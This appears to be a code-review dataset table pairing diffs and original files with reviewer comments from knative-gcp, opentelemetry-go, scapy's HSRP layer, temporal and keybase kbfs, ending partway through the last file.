| patch (string, 17-31.2k chars) | y (int64, 1-1) | oldf (string, 0-2.21M chars) | idx (int64, 1-1) | id (int64, 4.29k-68.4k) | msg (string, 8-843 chars) | proj (string, 212 classes) | lang (string, 9 classes) |
|---|---|---|---|---|---|---|---|
@@ -19,10 +19,10 @@ package v1alpha1
import (
"context"
+ "github.com/google/knative-gcp/pkg/logging"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/equality"
"knative.dev/eventing/pkg/apis/messaging"
- "knative.dev/eventing/pkg/logging"
"knative.dev/pkg/apis"
"github.com/google/knative-gcp/pkg/apis/configs/gcpauth" | 1 | /*
Copyright 2019 The Knative Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package v1alpha1
import (
"context"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/equality"
"knative.dev/eventing/pkg/apis/messaging"
"knative.dev/eventing/pkg/logging"
"knative.dev/pkg/apis"
"github.com/google/knative-gcp/pkg/apis/configs/gcpauth"
"github.com/google/knative-gcp/pkg/apis/duck"
"github.com/google/knative-gcp/pkg/apis/messaging/internal"
metadataClient "github.com/google/knative-gcp/pkg/gclient/metadata"
)
func (c *Channel) SetDefaults(ctx context.Context) {
ctx = apis.WithinParent(ctx, c.ObjectMeta)
// We need to set this to the _stored_ version of the Channel. If we set to anything other than
// the stored version, then when reading the stored version, conversion won't be called so
// nothing will set it to the stored version.
// Note that if a user sends a bad version of this annotation (e.g. sets it to v1beta1), then we
// won't overwrite their bad input. This is because the webhook:
// 1. Reads the stored version.
// 2. Converts to the desired version.
// 3. Defaults the desired version.
// So we don't know if the user or the converter put the value here, therefore we are forced to
// assume it was the converter and shouldn't change it.
if c.Annotations == nil {
c.Annotations = make(map[string]string, 1)
}
if _, present := c.Annotations[messaging.SubscribableDuckVersionAnnotation]; !present {
c.Annotations[messaging.SubscribableDuckVersionAnnotation] = internal.StoredChannelVersion
}
c.Spec.SetDefaults(ctx)
duck.SetClusterNameAnnotation(&c.ObjectMeta, metadataClient.NewDefaultMetadataClient())
}
func (cs *ChannelSpec) SetDefaults(ctx context.Context) {
ad := gcpauth.FromContextOrDefaults(ctx).GCPAuthDefaults
if ad == nil {
// TODO This should probably error out, rather than silently allow in non-defaulted COs.
logging.FromContext(ctx).Error("Failed to get the GCPAuthDefaults")
return
}
if cs.ServiceAccountName == "" && cs.Secret == nil || equality.Semantic.DeepEqual(cs.Secret, &corev1.SecretKeySelector{}) {
cs.ServiceAccountName = ad.KSA(apis.ParentMeta(ctx).Namespace)
cs.Secret = ad.Secret(apis.ParentMeta(ctx).Namespace)
}
}
| 1 | 17,867 | did we move the eventing logging here? Probably the eventing logging was removed and they are now using the pkg logging in eventing. If that is the case, we should do the same here | google-knative-gcp | go
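A minimal sketch of what the swapped-in logging package could look like, assuming (as the comment above guesses) that knative-gcp's `pkg/logging` simply delegates to `knative.dev/pkg/logging`; the wrapper below is illustrative, not the actual knative-gcp implementation.

```go
// Package logging is a hypothetical stand-in for
// github.com/google/knative-gcp/pkg/logging, assumed here to forward to
// knative.dev/pkg/logging so call sites such as
// logging.FromContext(ctx).Error(...) keep working after the import swap.
package logging

import (
	"context"

	"go.uber.org/zap"
	pkglogging "knative.dev/pkg/logging"
)

// FromContext returns the logger stored in ctx (or a default one),
// mirroring the knative.dev/pkg/logging API.
func FromContext(ctx context.Context) *zap.SugaredLogger {
	return pkglogging.FromContext(ctx)
}
```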
@@ -50,8 +50,7 @@ type Filter func(*http.Request) bool
// the mux are wrapped with WithRouteTag. A Handler will add various attributes
// to the span using the core.Keys defined in this package.
type Handler struct {
- operation string
- handler http.Handler
+ handler http.Handler
tracer trace.Tracer
props propagation.Propagators | 1 | // Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package othttp
import (
"io"
"net/http"
"go.opentelemetry.io/otel/api/core"
"go.opentelemetry.io/otel/api/global"
"go.opentelemetry.io/otel/api/propagation"
"go.opentelemetry.io/otel/api/trace"
)
var _ http.Handler = &Handler{}
// Attribute keys that the Handler can add to a span.
const (
HostKey = core.Key("http.host") // the http host (http.Request.Host)
MethodKey = core.Key("http.method") // the http method (http.Request.Method)
PathKey = core.Key("http.path") // the http path (http.Request.URL.Path)
URLKey = core.Key("http.url") // the http url (http.Request.URL.String())
UserAgentKey = core.Key("http.user_agent") // the http user agent (http.Request.UserAgent())
RouteKey = core.Key("http.route") // the http route (ex: /users/:id)
StatusCodeKey = core.Key("http.status_code") // if set, the http status
ReadBytesKey = core.Key("http.read_bytes") // if anything was read from the request body, the total number of bytes read
ReadErrorKey = core.Key("http.read_error") // If an error occurred while reading a request, the string of the error (io.EOF is not recorded)
WroteBytesKey = core.Key("http.wrote_bytes") // if anything was written to the response writer, the total number of bytes written
WriteErrorKey = core.Key("http.write_error") // if an error occurred while writing a reply, the string of the error (io.EOF is not recorded)
)
// Filter is a predicate used to determine whether a given http.request should
// be traced. A Filter must return true if the request should be traced.
type Filter func(*http.Request) bool
// Handler is http middleware that corresponds to the http.Handler interface and
// is designed to wrap a http.Mux (or equivalent), while individual routes on
// the mux are wrapped with WithRouteTag. A Handler will add various attributes
// to the span using the core.Keys defined in this package.
type Handler struct {
operation string
handler http.Handler
tracer trace.Tracer
props propagation.Propagators
spanStartOptions []trace.StartOption
readEvent bool
writeEvent bool
filters []Filter
}
// Option function used for setting *optional* Handler properties
type Option func(*Handler)
// WithTracer configures the Handler with a specific tracer. If this option
// isn't specified then the global tracer is used.
func WithTracer(tracer trace.Tracer) Option {
return func(h *Handler) {
h.tracer = tracer
}
}
// WithPublicEndpoint configures the Handler to link the span with an incoming
// span context. If this option is not provided, then the association is a child
// association instead of a link.
func WithPublicEndpoint() Option {
return func(h *Handler) {
h.spanStartOptions = append(h.spanStartOptions, trace.WithNewRoot())
}
}
// WithPropagators configures the Handler with specific propagators. If this
// option isn't specified then
// go.opentelemetry.io/otel/api/global.Propagators are used.
func WithPropagators(ps propagation.Propagators) Option {
return func(h *Handler) {
h.props = ps
}
}
// WithSpanOptions configures the Handler with an additional set of
// trace.StartOptions, which are applied to each new span.
func WithSpanOptions(opts ...trace.StartOption) Option {
return func(h *Handler) {
h.spanStartOptions = append(h.spanStartOptions, opts...)
}
}
// WithFilter adds a filter to the list of filters used by the handler.
// If any filter indicates to exclude a request then the request will not be
// traced. All filters must allow a request to be traced for a Span to be created.
// If no filters are provided then all requests are traced.
// Filters will be invoked for each processed request, it is advised to make them
// simple and fast.
func WithFilter(f Filter) Option {
return func(h *Handler) {
h.filters = append(h.filters, f)
}
}
type event int
// Different types of events that can be recorded, see WithMessageEvents
const (
ReadEvents event = iota
WriteEvents
)
// WithMessageEvents configures the Handler to record the specified events
// (span.AddEvent) on spans. By default only summary attributes are added at the
// end of the request.
//
// Valid events are:
// * ReadEvents: Record the number of bytes read after every http.Request.Body.Read
// using the ReadBytesKey
// * WriteEvents: Record the number of bytes written after every http.ResponseWriter.Write
// using the WroteBytesKey
func WithMessageEvents(events ...event) Option {
return func(h *Handler) {
for _, e := range events {
switch e {
case ReadEvents:
h.readEvent = true
case WriteEvents:
h.writeEvent = true
}
}
}
}
// NewHandler wraps the passed handler, functioning like middleware, in a span
// named after the operation and with any provided HandlerOptions.
func NewHandler(handler http.Handler, operation string, opts ...Option) http.Handler {
h := Handler{handler: handler, operation: operation}
defaultOpts := []Option{
WithTracer(global.Tracer("go.opentelemetry.io/plugin/othttp")),
WithPropagators(global.Propagators()),
WithSpanOptions(trace.WithSpanKind(trace.SpanKindServer)),
}
for _, opt := range append(defaultOpts, opts...) {
opt(&h)
}
return &h
}
// ServeHTTP serves HTTP requests (http.Handler)
func (h *Handler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
for _, f := range h.filters {
if !f(r) {
// Simply pass through to the handler if a filter rejects the request
h.handler.ServeHTTP(w, r)
return
}
}
opts := append([]trace.StartOption{}, h.spanStartOptions...) // start with the configured options
ctx := propagation.ExtractHTTP(r.Context(), h.props, r.Header)
ctx, span := h.tracer.Start(ctx, h.operation, opts...)
defer span.End()
readRecordFunc := func(int64) {}
if h.readEvent {
readRecordFunc = func(n int64) {
span.AddEvent(ctx, "read", ReadBytesKey.Int64(n))
}
}
bw := bodyWrapper{ReadCloser: r.Body, record: readRecordFunc}
r.Body = &bw
writeRecordFunc := func(int64) {}
if h.writeEvent {
writeRecordFunc = func(n int64) {
span.AddEvent(ctx, "write", WroteBytesKey.Int64(n))
}
}
rww := &respWriterWrapper{ResponseWriter: w, record: writeRecordFunc, ctx: ctx, props: h.props}
// Setup basic span attributes before calling handler.ServeHTTP so that they
// are available to be mutated by the handler if needed.
span.SetAttributes(
HostKey.String(r.Host),
MethodKey.String(r.Method),
PathKey.String(r.URL.Path),
URLKey.String(r.URL.String()),
UserAgentKey.String(r.UserAgent()),
)
h.handler.ServeHTTP(rww, r.WithContext(ctx))
setAfterServeAttributes(span, bw.read, rww.written, int64(rww.statusCode), bw.err, rww.err)
}
func setAfterServeAttributes(span trace.Span, read, wrote, statusCode int64, rerr, werr error) {
kv := make([]core.KeyValue, 0, 5)
// TODO: Consider adding an event after each read and write, possibly as an
// option (defaulting to off), so as to not create needlessly verbose spans.
if read > 0 {
kv = append(kv, ReadBytesKey.Int64(read))
}
if rerr != nil && rerr != io.EOF {
kv = append(kv, ReadErrorKey.String(rerr.Error()))
}
if wrote > 0 {
kv = append(kv, WroteBytesKey.Int64(wrote))
}
if statusCode > 0 {
kv = append(kv, StatusCodeKey.Int64(statusCode))
}
if werr != nil && werr != io.EOF {
kv = append(kv, WriteErrorKey.String(werr.Error()))
}
span.SetAttributes(kv...)
}
// WithRouteTag annotates a span with the provided route name using the
// RouteKey Tag.
func WithRouteTag(route string, h http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
span := trace.SpanFromContext(r.Context())
span.SetAttributes(RouteKey.String(route))
h.ServeHTTP(w, r)
})
}
| 1 | 11,773 | I think that `Handler` should preserve the `operation` member and the span formatter should receive the operation name string as a parameter too, otherwise the `operation` parameter in the `NewHandler` function becomes useless if we pass a custom span formatter. Also, shouldn't it be called `spanNameFormatter`? | open-telemetry-opentelemetry-go | go |
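A hedged sketch of what the reviewer is asking for: keep the `operation` field on `Handler` and pass it through to a user-supplied name formatter, so the `operation` argument of `NewHandler` still matters when a custom formatter is installed. The `spanNameFormatter` type and `WithSpanNameFormatter` option are hypothetical names chosen for illustration, not the actual otel-go API.

```go
// Sketch only: a handler that keeps the operation string and hands it to a
// formatter. spanNameFormatter and WithSpanNameFormatter are assumptions.
package othttp

import "net/http"

type spanNameFormatter func(operation string, r *http.Request) string

type handlerSketch struct {
	operation  string
	formatName spanNameFormatter
}

// WithSpanNameFormatter installs a custom span name formatter.
func WithSpanNameFormatter(f spanNameFormatter) func(*handlerSketch) {
	return func(h *handlerSketch) { h.formatName = f }
}

// spanName passes the operation to the formatter when one is set,
// and falls back to the raw operation string otherwise.
func (h *handlerSketch) spanName(r *http.Request) string {
	if h.formatName != nil {
		return h.formatName(h.operation, r)
	}
	return h.operation
}
```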
@@ -67,7 +67,7 @@ class HSRPmd5(Packet):
ByteEnumField("algo", 0, {1: "MD5"}),
ByteField("padding", 0x00),
XShortField("flags", 0x00),
- IPField("sourceip", None),
+ IPField("sourceip", "127.0.0.1"),
XIntField("keyid", 0x00),
StrFixedLenField("authdigest", "\00" * 16, 16)]
| 1 | ## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more information
## Copyright (C) Philippe Biondi <[email protected]>
## This program is published under a GPLv2 license
#############################################################################
## ##
## hsrp.py --- HSRP protocol support for Scapy ##
## ##
## Copyright (C) 2010 Mathieu RENARD mathieu.renard(at)gmail.com ##
## ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License version 2 as ##
## published by the Free Software Foundation; version 2. ##
## ##
## This program is distributed in the hope that it will be useful, but ##
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
## General Public License for more details. ##
## ##
#############################################################################
## HSRP Version 1
## Ref. RFC 2281
## HSRP Version 2
## Ref. http://www.smartnetworks.jp/2006/02/hsrp_8_hsrp_version_2.html
##
## $Log: hsrp.py,v $
## Revision 0.2 2011/05/01 15:23:34 mrenard
## Cleanup code
"""
HSRP (Hot Standby Router Protocol): proprietary redundancy protocol for Cisco routers.
"""
from scapy.fields import *
from scapy.packet import *
from scapy.layers.inet import DestIPField, UDP
from scapy.layers.inet6 import DestIP6Field
class HSRP(Packet):
name = "HSRP"
fields_desc = [
ByteField("version", 0),
ByteEnumField("opcode", 0, {0: "Hello", 1: "Coup", 2: "Resign", 3: "Advertise"}),
ByteEnumField("state", 16, {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}),
ByteField("hellotime", 3),
ByteField("holdtime", 10),
ByteField("priority", 120),
ByteField("group", 1),
ByteField("reserved", 0),
StrFixedLenField("auth", "cisco" + "\00" * 3, 8),
IPField("virtualIP", "192.168.1.1")]
def guess_payload_class(self, payload):
if self.underlayer.len > 28:
return HSRPmd5
else:
return Packet.guess_payload_class(self, payload)
class HSRPmd5(Packet):
name = "HSRP MD5 Authentication"
fields_desc = [
ByteEnumField("type", 4, {4: "MD5 authentication"}),
ByteField("len", None),
ByteEnumField("algo", 0, {1: "MD5"}),
ByteField("padding", 0x00),
XShortField("flags", 0x00),
IPField("sourceip", None),
XIntField("keyid", 0x00),
StrFixedLenField("authdigest", "\00" * 16, 16)]
def post_build(self, p, pay):
if self.len is None and pay:
l = len(pay)
p = p[:1] + hex(l)[30:] + p[30:]
return p
bind_layers(UDP, HSRP, dport=1985, sport=1985)
bind_layers(UDP, HSRP, dport=2029, sport=2029)
DestIPField.bind_addr(UDP, "224.0.0.2", dport=1985)
DestIP6Field.bind_addr(UDP, "ff02::66", dport=2029)
| 1 | 9,226 | Can you merge #466? That would make the current `None` default value work and be more relevant than `"127.0.0.1"`. | secdev-scapy | py
@@ -96,14 +96,15 @@ func (v *Validator) Validate(searchAttributes *commonpb.SearchAttributes, namesp
}
for saName, saPayload := range searchAttributes.GetIndexedFields() {
- if IsReservedField(saName) {
- return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is Temporal reserved field name", saName))
+ if !typeMap.IsDefined(saName) {
+ return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is not a valid search attribute name", saName))
}
- saType, err := typeMap.GetType(saName)
+ saType, err := typeMap.getType(saName, customCategory|predefinedCategory)
if err != nil {
- return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is not a valid search attribute name", saName))
+ return serviceerror.NewInvalidArgument(fmt.Sprintf("%s attribute can't be set in SearchAttributes: reserved field name", saName))
}
+
_, err = DecodeValue(saPayload, saType)
if err != nil {
var invalidValue interface{} | 1 | // The MIT License
//
// Copyright (c) 2020 Temporal Technologies Inc. All rights reserved.
//
// Copyright (c) 2020 Uber Technologies, Inc.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
package searchattribute
import (
"errors"
"fmt"
commonpb "go.temporal.io/api/common/v1"
"go.temporal.io/api/serviceerror"
"go.temporal.io/server/common/dynamicconfig"
"go.temporal.io/server/common/log"
"go.temporal.io/server/common/log/tag"
"go.temporal.io/server/common/payload"
)
type (
// Validator is used to validate search attributes
Validator struct {
logger log.Logger
searchAttributesProvider Provider
searchAttributesNumberOfKeysLimit dynamicconfig.IntPropertyFnWithNamespaceFilter
searchAttributesSizeOfValueLimit dynamicconfig.IntPropertyFnWithNamespaceFilter
searchAttributesTotalSizeLimit dynamicconfig.IntPropertyFnWithNamespaceFilter
}
)
var (
ErrExceedSizeLimit = errors.New("exceeds size limit")
)
// NewValidator create Validator
func NewValidator(
logger log.Logger,
searchAttributesProvider Provider,
searchAttributesNumberOfKeysLimit dynamicconfig.IntPropertyFnWithNamespaceFilter,
searchAttributesSizeOfValueLimit dynamicconfig.IntPropertyFnWithNamespaceFilter,
searchAttributesTotalSizeLimit dynamicconfig.IntPropertyFnWithNamespaceFilter,
) *Validator {
return &Validator{
logger: logger,
searchAttributesProvider: searchAttributesProvider,
searchAttributesNumberOfKeysLimit: searchAttributesNumberOfKeysLimit,
searchAttributesSizeOfValueLimit: searchAttributesSizeOfValueLimit,
searchAttributesTotalSizeLimit: searchAttributesTotalSizeLimit,
}
}
// ValidateAndLog validate search attributes are valid for writing and not exceed limits
func (v *Validator) ValidateAndLog(searchAttributes *commonpb.SearchAttributes, namespace string, indexName string) error {
err := v.Validate(searchAttributes, namespace, indexName)
if err != nil {
v.logger.Warn("Search attributes are invalid.", tag.Error(err), tag.WorkflowNamespace(namespace), tag.ESIndex(indexName))
}
return err
}
// Validate validate search attributes are valid for writing.
func (v *Validator) Validate(searchAttributes *commonpb.SearchAttributes, namespace string, indexName string) error {
if searchAttributes == nil {
return nil
}
lengthOfFields := len(searchAttributes.GetIndexedFields())
if lengthOfFields > v.searchAttributesNumberOfKeysLimit(namespace) {
return serviceerror.NewInvalidArgument(fmt.Sprintf("number of search attributes %d exceeds limit %d", lengthOfFields, v.searchAttributesNumberOfKeysLimit(namespace)))
}
typeMap, err := v.searchAttributesProvider.GetSearchAttributes(indexName, false)
if err != nil {
return serviceerror.NewInvalidArgument(fmt.Sprintf("unable to get search attributes from cluster metadata: %v", err))
}
for saName, saPayload := range searchAttributes.GetIndexedFields() {
if IsReservedField(saName) {
return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is Temporal reserved field name", saName))
}
saType, err := typeMap.GetType(saName)
if err != nil {
return serviceerror.NewInvalidArgument(fmt.Sprintf("%s is not a valid search attribute name", saName))
}
_, err = DecodeValue(saPayload, saType)
if err != nil {
var invalidValue interface{}
if err := payload.Decode(saPayload, &invalidValue); err != nil {
invalidValue = fmt.Sprintf("value from <%s>", saPayload.String())
}
return serviceerror.NewInvalidArgument(fmt.Sprintf("%v is not a valid value for search attribute %s of type %s", invalidValue, saName, saType))
}
}
return nil
}
// ValidateSize validate search attributes are valid for writing and not exceed limits
func (v *Validator) ValidateSize(searchAttributes *commonpb.SearchAttributes, namespace string) error {
if searchAttributes == nil {
return nil
}
for saName, saPayload := range searchAttributes.GetIndexedFields() {
if len(saPayload.GetData()) > v.searchAttributesSizeOfValueLimit(namespace) {
return fmt.Errorf("search attribute %s value of size %d: %w %d", saName, len(saPayload.GetData()), ErrExceedSizeLimit, v.searchAttributesSizeOfValueLimit(namespace))
}
}
if searchAttributes.Size() > v.searchAttributesTotalSizeLimit(namespace) {
return fmt.Errorf("total size of search attributes %d: %w %d", searchAttributes.Size(), ErrExceedSizeLimit, v.searchAttributesTotalSizeLimit(namespace))
}
return nil
}
| 1 | 11,951 | is a reserved field name the only possible reason this could fail? | temporalio-temporal | go
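A small self-contained sketch of the category-filtered lookup the diff relies on; the names (`saCategory`, `customCategory`, `systemCategory`, `nameTypeMap`) are assumptions for illustration, not Temporal's actual types. It shows why, once `IsDefined` has passed, a `getType` failure with this allowed-category mask can only mean the attribute falls outside the permitted categories, i.e. a reserved/system field — which is exactly what the question above is probing.

```go
package main

import "fmt"

// Hypothetical category bitmask and map, not the real Temporal types.
type saCategory int

const (
	customCategory saCategory = 1 << iota
	predefinedCategory
	systemCategory // reserved fields live here
)

type saEntry struct {
	valueType string
	category  saCategory
}

type nameTypeMap map[string]saEntry

func (m nameTypeMap) IsDefined(name string) bool { _, ok := m[name]; return ok }

// getType fails only when the name is defined but its category is excluded.
func (m nameTypeMap) getType(name string, allowed saCategory) (string, error) {
	e, ok := m[name]
	if !ok {
		return "", fmt.Errorf("%s is not defined", name)
	}
	if e.category&allowed == 0 {
		return "", fmt.Errorf("%s is a reserved/system field", name)
	}
	return e.valueType, nil
}

func main() {
	m := nameTypeMap{
		"CustomKeywordField": {"Keyword", customCategory},
		"RunId":              {"Keyword", systemCategory},
	}
	_, err := m.getType("RunId", customCategory|predefinedCategory)
	fmt.Println(err) // RunId is a reserved/system field
}
```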
@@ -169,6 +169,10 @@ func defaultLogPath(ctx Context) string {
// DefaultInitParams returns default init params
func DefaultInitParams(ctx Context) InitParams {
+ journalEnv := os.Getenv("KBFS_ENABLE_JOURNAL")
+ if journalEnv == "" {
+ journalEnv = "true"
+ }
return InitParams{
Debug: BoolForString(os.Getenv("KBFS_DEBUG")),
BServerAddr: defaultBServer(ctx), | 1 | // Copyright 2016 Keybase Inc. All rights reserved.
// Use of this source code is governed by a BSD
// license that can be found in the LICENSE file.
package libkbfs
import (
"context"
"errors"
"flag"
"fmt"
"os"
"os/signal"
"path/filepath"
"strings"
"time"
"github.com/keybase/client/go/libkb"
"github.com/keybase/client/go/logger"
"github.com/keybase/client/go/protocol/keybase1"
"github.com/keybase/go-framed-msgpack-rpc/rpc"
"github.com/keybase/kbfs/kbfsmd"
)
const (
// InitDefaultString is the normal mode for when KBFS data will be
// read and written.
InitDefaultString string = "default"
// InitMinimalString is for when KBFS will only be used as a MD
// lookup layer (e.g., for chat on mobile).
InitMinimalString = "minimal"
// InitSingleOpString is for when KBFS will only be used for a
// single logical operation (e.g., as a git remote helper).
InitSingleOpString = "singleOp"
)
// InitParams contains the initialization parameters for Init(). It is
// usually filled in by the flags parser passed into AddFlags().
type InitParams struct {
// Whether to print debug messages.
Debug bool
// If non-empty, the host:port of the block server. If empty,
// a default value is used depending on the run mode. Can also
// be "memory" for an in-memory test server or
// "dir:/path/to/dir" for an on-disk test server.
BServerAddr string
// If non-empty the host:port of the metadata server. If
// empty, a default value is used depending on the run mode.
// Can also be "memory" for an in-memory test server or
// "dir:/path/to/dir" for an on-disk test server.
MDServerAddr string
// If non-zero, specifies the capacity (in bytes) of the block cache. If
// zero, the capacity is set using getDefaultBlockCacheCapacity().
CleanBlockCacheCapacity uint64
// Fake local user name.
LocalUser string
// Where to put favorites. Has an effect only when LocalUser
// is non-empty, in which case it must be either "memory" or
// "dir:/path/to/dir".
LocalFavoriteStorage string
// TLFValidDuration is the duration that TLFs are valid
// before marked for lazy revalidation.
TLFValidDuration time.Duration
// MetadataVersion is the default version of metadata to use
// when creating new metadata.
MetadataVersion kbfsmd.MetadataVer
// LogToFile if true, logs to a default file location.
LogToFile bool
// LogFileConfig tells us where to log and rotation config.
LogFileConfig logger.LogFileConfig
// TLFJournalBackgroundWorkStatus is the status to use to
// pass into JournalServer.enableJournaling. Only has an effect when
// EnableJournal is non-empty.
TLFJournalBackgroundWorkStatus TLFJournalBackgroundWorkStatus
// CreateSimpleFSInstance creates a SimpleFSInterface from config.
// If this is nil then simplefs will be omitted in the rpc api.
CreateSimpleFSInstance func(Config) keybase1.SimpleFSInterface
// CreateGitHandlerInstance creates a KBFSGitInterface from config.
// If this is nil then git will be omitted in the rpc api.
CreateGitHandlerInstance func(Config) keybase1.KBFSGitInterface
// EnableJournal enables journaling.
EnableJournal bool
// DiskCacheMode specifies which mode to start the disk cache.
DiskCacheMode DiskCacheMode
// StorageRoot, if non-empty, points to a local directory to put its local
// databases for things like the journal or disk cache.
StorageRoot string
// BGFlushPeriod indicates how long to wait for a batch to fill up
// before syncing a set of changes on a TLF to the servers.
BGFlushPeriod time.Duration
// BGFlushDirOpBatchSize indicates how many directory operations
// in a TLF should be batched together in a single background
// flush.
BGFlushDirOpBatchSize int
// Mode describes how KBFS should initialize itself.
Mode string
}
// defaultBServer returns the default value for the -bserver flag.
func defaultBServer(ctx Context) string {
switch ctx.GetRunMode() {
case libkb.DevelRunMode:
return memoryAddr
case libkb.StagingRunMode:
return `
bserver-0.dev.keybase.io:443,bserver-1.dev.keybase.io:443`
case libkb.ProductionRunMode:
return `
bserver-0.kbfs.keybaseapi.com:443,bserver-1.kbfs.keybaseapi.com:443;
bserver-0.kbfs.keybase.io:443,bserver-1.kbfs.keybase.io:443`
default:
return ""
}
}
// defaultMDServer returns the default value for the -mdserver flag.
func defaultMDServer(ctx Context) string {
switch ctx.GetRunMode() {
case libkb.DevelRunMode:
return memoryAddr
case libkb.StagingRunMode:
return `
mdserver-0.dev.keybase.io:443,mdserver-1.dev.keybase.io:443`
case libkb.ProductionRunMode:
return `
mdserver-0.kbfs.keybaseapi.com:443,mdserver-1.kbfs.keybaseapi.com:443;
mdserver-0.kbfs.keybase.io:443,mdserver-1.kbfs.keybase.io:443`
default:
return ""
}
}
// defaultMetadataVersion returns the default metadata version per run mode.
func defaultMetadataVersion(ctx Context) kbfsmd.MetadataVer {
switch ctx.GetRunMode() {
case libkb.DevelRunMode:
return kbfsmd.ImplicitTeamsVer
case libkb.StagingRunMode:
return kbfsmd.ImplicitTeamsVer
case libkb.ProductionRunMode:
// TODO(KBFS-2621): flip this.
return kbfsmd.SegregatedKeyBundlesVer
default:
return kbfsmd.ImplicitTeamsVer
}
}
func defaultLogPath(ctx Context) string {
return filepath.Join(ctx.GetLogDir(), libkb.KBFSLogFileName)
}
// DefaultInitParams returns default init params
func DefaultInitParams(ctx Context) InitParams {
return InitParams{
Debug: BoolForString(os.Getenv("KBFS_DEBUG")),
BServerAddr: defaultBServer(ctx),
MDServerAddr: defaultMDServer(ctx),
TLFValidDuration: tlfValidDurationDefault,
MetadataVersion: defaultMetadataVersion(ctx),
LogFileConfig: logger.LogFileConfig{
MaxAge: 30 * 24 * time.Hour,
MaxSize: 128 * 1024 * 1024,
MaxKeepFiles: 3,
},
TLFJournalBackgroundWorkStatus: TLFJournalBackgroundWorkEnabled,
StorageRoot: ctx.GetDataDir(),
BGFlushPeriod: bgFlushPeriodDefault,
BGFlushDirOpBatchSize: bgFlushDirOpBatchSizeDefault,
EnableJournal: true,
DiskCacheMode: DiskCacheModeLocal,
Mode: InitDefaultString,
}
}
// AddFlagsWithDefaults adds libkbfs flags to the given FlagSet, given
// a set of default flags. Returns an InitParams that will be filled
// in once the given FlagSet is parsed.
func AddFlagsWithDefaults(
flags *flag.FlagSet, defaultParams InitParams,
defaultLogPath string) *InitParams {
var params InitParams
flags.BoolVar(¶ms.Debug, "debug", defaultParams.Debug,
"Print debug messages")
flags.StringVar(¶ms.BServerAddr, "bserver", defaultParams.BServerAddr,
"host:port of the block server, 'memory', or 'dir:/path/to/dir'")
flags.StringVar(¶ms.MDServerAddr, "mdserver",
defaultParams.MDServerAddr,
"host:port of the metadata server, 'memory', or 'dir:/path/to/dir'")
flags.StringVar(¶ms.LocalUser, "localuser", defaultParams.LocalUser,
"fake local user")
flags.StringVar(¶ms.LocalFavoriteStorage, "local-fav-storage",
defaultParams.LocalFavoriteStorage,
"where to put favorites; used only when -localuser is set, then must "+
"either be 'memory' or 'dir:/path/to/dir'")
flags.DurationVar(¶ms.TLFValidDuration, "tlf-valid",
defaultParams.TLFValidDuration,
"time tlfs are valid before redoing identification")
flags.BoolVar(¶ms.LogToFile, "log-to-file", defaultParams.LogToFile,
fmt.Sprintf("Log to default file: %s", defaultLogPath))
flags.StringVar(¶ms.LogFileConfig.Path, "log-file", "",
"Path to log file")
flags.DurationVar(¶ms.LogFileConfig.MaxAge, "log-file-max-age",
defaultParams.LogFileConfig.MaxAge,
"Maximum age of a log file before rotation")
params.LogFileConfig.MaxSize = defaultParams.LogFileConfig.MaxSize
flags.Var(SizeFlag{¶ms.LogFileConfig.MaxSize}, "log-file-max-size",
"Maximum size of a log file before rotation")
// The default is to *DELETE* old log files for kbfs.
flags.IntVar(¶ms.LogFileConfig.MaxKeepFiles, "log-file-max-keep-files",
defaultParams.LogFileConfig.MaxKeepFiles, "Maximum number of log "+
"files for this service, older ones are deleted. 0 for infinite.")
flags.Uint64Var(¶ms.CleanBlockCacheCapacity, "clean-bcache-cap",
defaultParams.CleanBlockCacheCapacity,
"If non-zero, specify the capacity of clean block cache. If zero, "+
"the capacity is set based on system RAM.")
flags.StringVar(¶ms.StorageRoot, "storage-root",
defaultParams.StorageRoot, "Specifies where Keybase will store its "+
"local databases for the journal and disk cache.")
params.DiskCacheMode = defaultParams.DiskCacheMode
flags.Var(¶ms.DiskCacheMode, "disk-cache-mode",
"Sets the mode for the disk cache. If 'local', then it uses a "+
"subdirectory of -storage-root to store the cache. If 'remote', "+
"then it connects to the local KBFS instance and delegates disk "+
